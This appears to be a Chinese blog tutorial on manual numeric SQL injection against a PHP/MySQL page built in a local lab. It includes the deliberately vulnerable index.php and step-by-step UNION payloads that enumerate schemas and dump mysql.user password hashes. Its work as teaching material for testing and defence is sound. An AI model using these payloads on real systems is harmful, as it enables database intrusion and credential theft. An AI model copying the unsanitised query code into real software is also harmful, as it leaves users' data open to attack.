SQL注入之PHP-MySQL实现手工注入-数字型
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。
完整笔记地址:https://www.cnblogs.com/LyShark/p/10632263.html
整形注入目录:
- 搭建测试环境
- 手工判断SQL注入点
- 判断数据库权限
- 判断字段数
- 判断数据库版本
- 查询数据库名称
- 查询字段
- 查询表中数据
搭建注入测试环境
1.首先在实验之前我们需要搭建相应的环境以供下面SQL注入例子的练习.
a.这里我们在Centos 7 上搭建一个LAMP环境.
[root@localhost ~]# yum install -y httpd httpd-devel mariadb mariadb-server mysql-devel php php-mysql php-common php-gd php-xml
已加载插件:fastestmirror
Loading mirror speeds from cached hostfile
软件包 httpd-2.4.-.el7.centos.x86_64 已安装并且是最新版本
软件包 httpd-devel-2.4.-.el7.centos.x86_64 已安装并且是最新版本
软件包 :mariadb-5.5.-.el7.x86_64 已安装并且是最新版本
软件包 :mariadb-server-5.5.-.el7.x86_64 已安装并且是最新版本
软件包 :mariadb-devel-5.5.-.el7.x86_64 已安装并且是最新版本
软件包 php-5.4.-.el7.x86_64 已安装并且是最新版本
软件包 php-mysql-5.4.-.el7.x86_64 已安装并且是最新版本
软件包 php-common-5.4.-.el7.x86_64 已安装并且是最新版本
软件包 php-gd-5.4.-.el7.x86_64 已安装并且是最新版本
软件包 php-xml-5.4.-.el7.x86_64 已安装并且是最新版本
b.进入MySQL并创建一个测试用的数据表,写入一些查询数据.
[root@localhost ~]# mysql -uroot -p
Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 10
Server version: 5.5.56-MariaDB MariaDB Server Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> create database lyshark;
Query OK, 1 row affected (0.06 sec) MariaDB [(none)]> use lyshark;
Database changed MariaDB [lyshark]> create table lyshark (
-> `id` int(10) NOT NULL,
-> `title` varchar(1000) NOT NULL,
-> `text` varchar(1000) NOT NULL
-> );
Query OK, 0 rows affected (0.13 sec) MariaDB [lyshark]> insert into `lyshark` (`id`, `title`, `text`) values (1,'admin','hello admin');
Query OK, 1 row affected (0.00 sec) MariaDB [lyshark]> insert into `lyshark` (`id`, `title`, `text`) values (2,'lyshark','hello lyshark');
Query OK, 1 row affected (0.06 sec) MariaDB [lyshark]> insert into `lyshark` (`id`, `title`, `text`) values (3,'guest','hello guest');
Query OK, 1 row affected (0.00 sec)
c.在apache网页目录下新建一个index.php文件,配置好权限.
<?php
$id = $_GET['id'];
$connection = mysql_connect("127.0.0.1","root","");
mysql_select_db("lyshark",$connection);
$myquery = "select * from lyshark where id=$id";
$result = mysql_query($myquery);
while($row = mysql_fetch_array($result)){
echo "编号: ".$row['id']."<br >";
echo "标题: ".$row['title']."<br >";
echo "内容: ".$row['text']."<br >";
echo "<hr>";
}
mysql_close($connection);
echo "执行的SQL语句: ".$myquery."<hr>";
?>
d.访问主页测试看是否能读取数据
http://localhost/index.php?id=1
手工判断SQL注入点
提交单引号
使用and和or判断
我们也可以在参数后面加上 and 1=1 来判断是否存在注入点
和 and 1=0 对比一下看看有啥不同
经过上面的对比,我们可以看到 and 1=1 返回了数据,而and 1=0没有,这是由于1=1是一个为真的条件,前面的结果是true,true and true 所以没有任何问题,第二个 1=0 是个假条件, true and false 还是false,所以并没有数据返回。
接下来看下or、or就是或者,两个都为假,才会为假,只要一个为真就为真,把语句后面的id改成一个不存在的,后面接上or 1=1,这样的话就成了 false or true,结果为true。
下图可以看到,没有返回数据,记录不存在.
通过加法和减法判断
加法和减法的使用要区别是数字型还是字符型的注入、然后来区分了、可以看他后面的参数如果是数字、就一定是数字型、如果是一些字母的话就是字符型注入。
例如
select \* from user where id=4 #数字型注入 sql 语句
select \* from user where username=’fendo’ #字符型注入 sql 语句
输入加号
我们在参数输入1+1,看看返回的数据是不是id等于2的结果,这里注意一下+号在SQL语句是有特效含义的,所以我们要对其进行url编码,最后也就是%2b。
输入减号
减法是同样的道理,不过不需要对-号进行url编码了
判断数据库权限
判断ROOT权限,如果数值则说明存在root权限,否则不存在
and ord(mid(user(),1,1))=114
或者:
and (select count(\*) from mysql.user)>0
解释:
and (select count(\*) from mysql.user)>0 #如果结果返回正常,说明具有读写权限。
and (select count(\*) from mysql.user)>0 #返回错误,应该是管理员给数据库帐户降权了。
判断字段数
对于判断字段数有两种常用的猜测方式:
方式1:用union联合查询:and 1=1 union select 1,2,3,4,5…… 或 union select null,null,null……
UNION SELECT 联合查询:可以用于一个或多个SELECT的结果集,但是他有一个条件,就是两个select查询语句的查询必须要有相同的列才可以执行,利用这个特性我们可以进行对比查询,也就是说当我们union select的列与它查询的列相同时,页面返回正常。在and后面加上1=1或1=2的作用后面会讲。
例如:
a.首先猜测,当字段为2时页面返回错误
b.增加一个字段,为3时,页面显示正确
c.再次增加一个字段,为4时,页面显示错误
上面的结果,说明字段数就是3,输入的数大于或小于字段数时都会报错。使用 union select null,null,null 是一样的效果。
方式2:用order by 查询“order by * -- order by
order by查询:在sql语句中是对结果集的指定列进行排序,比如我们想让结果集按照第一列排序就是 order by 1 按照第二列排序 order by 2 依次类推,按照这个原理我们来判断他的字段数,如果我们按照他的第1列进行排序数据库会返回正常,但是当我们按照第100列排序,但是数据库中并不存在第100列,从而报错。
例如:
a.当我们测试到4时数据库无法显示数据.
b.说明该表只有三个字段.
===================这里存在两个小问题===================
第一个:大部分程序只会调用数据库查询的第一条语句进行查询然后返回(我们这个也是),而通过联合查询出的数据中,我们想看到的数据是在第二条语句中,如果我们想看到我们想要的数据有两种方法,第一种是让第一条数据返回假,
第二种是通过sql语句直接返回我们想要的数据。
第一种:我们让第一个查询的结果始终为假
上图可看到,什么都没有显示,因为填充时使用的null,所以返回的就是空null.
第二种:通过limit语句,limit在mysql中是用来分页的,通过他可以从查询出来的数据中获取我们想要的数据
LIMIT 子句可以被用于强制 SELECT 语句返回指定的记录数。LIMIT 接受一个或两个数字参数。参数必须是一个整数常量。如果给定两个参数,第一个参数指定第一个返回记录行的偏移量,第二个参数指定返回记录行的最大数目,初始记录行的偏移量是 0(而不是 1)。
例如:
SELECT * FROM table LIMIT 5,10; // 检索记录行 6-15
在地址偶棉加入以下代码看看:
上图结果返回也是空,因为这使用的null,所以返回的还是null。
第二个:哪个列中的数据是在页面中显示出来的,有一些列中的数据只是用于后台程序处理,并不会在前台显示,所以我们需要判断哪个字段我们可以看到。
所以,我们要通过数字代替NULL进行查询,来确定哪些字段会在页面中显示。这也就是为什么我们不一开始就用数字而用null,因为union select 不仅要求列的数量相同 同时数据类型也要相似。
查询数据库版本
版本大于5.0的mysql的information_schema库中存储着mysql的所有数据库和表结构信息,所以可以利用information_schema库快速注入。
通过下面的语句可以判断数据库版本:
and ord(mid(version(),1,1))>51
解释1: 确认数据库版本,51是ASCII码3 正确则>4.0 错误则<4.0,当版本大于3.0时才能使用union方法;
解释2: ord()是mysql的函数用于获取二进制码;
解释3: mid()是mysql的函数用于截位操作;
解释4: version()是mysql的函数用于获取当前数据库的版本;
显示正确:我这用的的mysql版本是大于5.0的
查询数据库名称
方法1:
可以直接使用mysql自带函数database()查询得到数据库名:
方法2:
使用以下语句语句得到所有的数据库名:
index.php?id=2 union select null,schema_name,null from information_schema.schemata
还可以获取第一个库名:
index.php?id=2 union select null,schema_name,null from information_schema.schemata limit 0,1
上图,并没有显示数据库名而显示的是第一条语句查询出来的结果。在union前面加上and 1=2,就能显示出来了。
index.php?id=2 and 1=2 union select null,schema_name,null from information_schema.schemata limit 0,1
获取第二个库名:
index.php?id=2 and 1=2 union select null,schema_name,null from information_schema.schemata limit 0,2
以此类推,即可获取到全部库..
查询数据表名称
在MySQL中,表名存放在information_schema数据库下tables表table_name字段中、查表名我们主要用到的是TABLES表。
方法1:
用group_concat它可以返回查询的所有结果,因为我们需要通过命名判断该我们需要的敏感数据。
group_concat()会计算哪些行属于同一组,将属于同一组的列显示出来。要返回哪些列,由函数参数(就是字段名)决定。分组必须有个标准,就是根据group by指定的列进行分组。
index.php?id=2 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='lyshark'
上图返回时正确的,数据库中就这3张表、这里我们的目标是lyshark表、因为当前的数据就是lyshark表中获取的。
方法2:
同样,使用下面的语句也是可以查出来的。
index.php?id=2 union select null,table_name,null from information_schema.tables where table_schema='lyshark'
查询字段
在MySQL中,字段名存放在information_schema数据库下columns表column_name字段中,这里使用的是columns表。
方法1:
index.php?id=2 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='lyshark' and table_name='lyshark'
我们也可以查看mysql库user表中的字段。
index.php?id=2 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='mysql' and table_name='user'
上图可以看出,我们已得到mysql库user表的所有字段.
方法2:
index.php?id=2 union select null,column_name,null from information_schema.columns where table_schema='mysql' and table_name='user'
同理,此处就不截图了.
查询表中数据
最终想得到的就是字段里的内容了、前面的数据库名、表名都获得了、获取值就很简单了。
方法1:
查询lyshark库中lyshark表中所有数据。
index.php?id=2 and 1=2 union select 1,group_concat(id,title,text),3 from lyshark
查询mysql数据库user表中的,Host,User,Password字段的内容.
index.php?id=2 and 1=2 union select 1,group_concat(Host,User,Password),3 from mysql.user
上图可以报出mysql的敏感数据.
方法2:
index.php?id=2 union select null,title,content from lyshark
index.php?id=2 union select Host,User,Password from mysql.user
方法3:
index.php?id=2 and 1=2 union select 1,2,concat(user,0x3c,pwd) from admin
方法2和方法3作用相同,此处不截图了。
SQL注入之PHP-MySQL实现手工注入-数字型的更多相关文章
- MySQL整形手工注入
0x1 判断注入点: http://www.xxx.org/members.php?id=1 and 1=1 --+ # ture http://www.xxx.org/members.php?id= ...
- 【菜鸟学注入】之MySQL报错注入详解
本文转自:http://bbs.blackbap.org/forum.php?mod=viewthread&tid=6483&highlight=mysql%2B报错注入 用SQL注入 ...
- phpcms手工注入教程
目标服务器(靶机):192.168.1.27 目标网站:http://192.168.1.27:8083 步骤: 一.靶机操作 1.进入靶机,查看IP地址: 开始-运行,输入cmd回车,出现命令行窗口 ...
- Sql注入之注入点类型和是否存在注入判断
SQL注入之判断注入类型注入类型分为数字型和字符型和搜索型例如数字型语句:select * from table where id =3,则字符型如下:select * from table wher ...
- 小白日记41:kali渗透测试之Web渗透-SQL手工注入(三)-猜测列名、表名、库名、字段内容,数据库写入
SQL手工注入 靶机:metasploitable(低) 1.当无权读取infomation_schema库[MySQL最重要的源数据库,必须有root权限]/拒绝union.order by语句 ...
- 小白日记40:kali渗透测试之Web渗透-SQL手工注入(二)-读取文件、写入文件、反弹shell
SQL手工注入 1.读取文件[load_file函数] ' union SELECT null,load_file('/etc/passwd')--+ burpsuite 2.写入文件 ' unio ...
- 小白日记39:kali渗透测试之Web渗透-SQL手工注入(一)-检测方法
SQL手工注入(一) SQL注入:通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.[SQL注入原理] ##服务端程序将用户输入参数作为查询 ...
- [转载] MySQL数据库5.X版本基本手工注入总结
MySQL数据库5.X版本基本手工注入总结 根据我对MySQL的认识,注入时,基本可以通过爆.盲注.报错三种方式获得用户名和密码,在权限足够的情况下,还可以直接通过SQL语句插入并导出我们的一句话we ...
- MYSQL手工注入(详细步骤)—— 待补充
0x00 SQL注入的分类: (1)基于从服务器接收到的响应 ▲基于错误的 SQL 注入 ▲联合查询的类型 ▲堆查询注射 ▲SQL 盲注 ...
随机推荐
- log4j日志整合输出(slf4j+commonslog+log4j+jdklogger)
log4j日志整合输出(slf4j+commonslog+log4j+jdklogger) 博客分类: 日志 J2EE项目中,经常会用到很多第三方的开源组件和软件,这些组件都使用各自的日志组件,比 ...
- (转贴)fusionCharts属性参考API
一.FusionCharts的分类 关于FusionCharts的基本介绍我就不在这里浪费篇幅了,想了解的朋友自己去www.baigoogedu.com里面找吧.我就说说FusionCharts的官方 ...
- keybd_event使用方法
Windows提供了一个模拟键盘API函数Keybd_event(),使用该函数可以相应的屏蔽键盘的动作.Keybd_event()函数能触发一个按键事件,也就是说会产生一个WM_KEYDOWN或WM ...
- Android Studio 老提示adb问题
Android Studio 老提示adb问题,restart后任然无解,最后发现某手机助手软件占用端口... 解决步骤: C:\Users\xxx>netstat -ano | findstr ...
- HierSort(希尔)————Java
利用Java进行希尔排序(元素中有0会有问题),步长经过调试length/2+1最合适. import java.util.Scanner; public class HierSort { priva ...
- Codeforces Round #523 (Div. 2) F. Katya and Segments Sets (交互题+思维)
https://codeforces.com/contest/1061/problem/F 题意 假设存在一颗完全k叉树(n<=1e5),允许你进行最多(n*60)次询问,然后输出这棵树的根,每 ...
- kvm虚拟化平台搭建
一.虚拟化 虚拟化是指计算机元件在虚拟的基础上而不是真实的基础上运行.虚拟化技术可以扩大硬件的容量,简化软件的重新配置过程.CPU的虚拟化技术可以单CPU模 拟多CPU并行,允许一个平台同时运行多个操 ...
- BZOJ 1024 [SCOI2009]生日快乐 (搜索)
1024: [SCOI2009]生日快乐 Time Limit: 1 Sec Memory Limit: 162 MBSubmit: 3025 Solved: 2201[Submit][Statu ...
- 学以致用七---Centos7.2+python3.6.2+django2.1.1 --搭建一个网站(补充)
补充:上一节出现的报错提示 可在settings.py 里,改成 ‘*’ ,这样所有的主机都可以访问了. 打开网页 注意红色框出来的 hello 是和 urls.py里的hello对应 urls.p ...
- 5W2H+35问
之前看到的一个非常好且全面的做事方法论.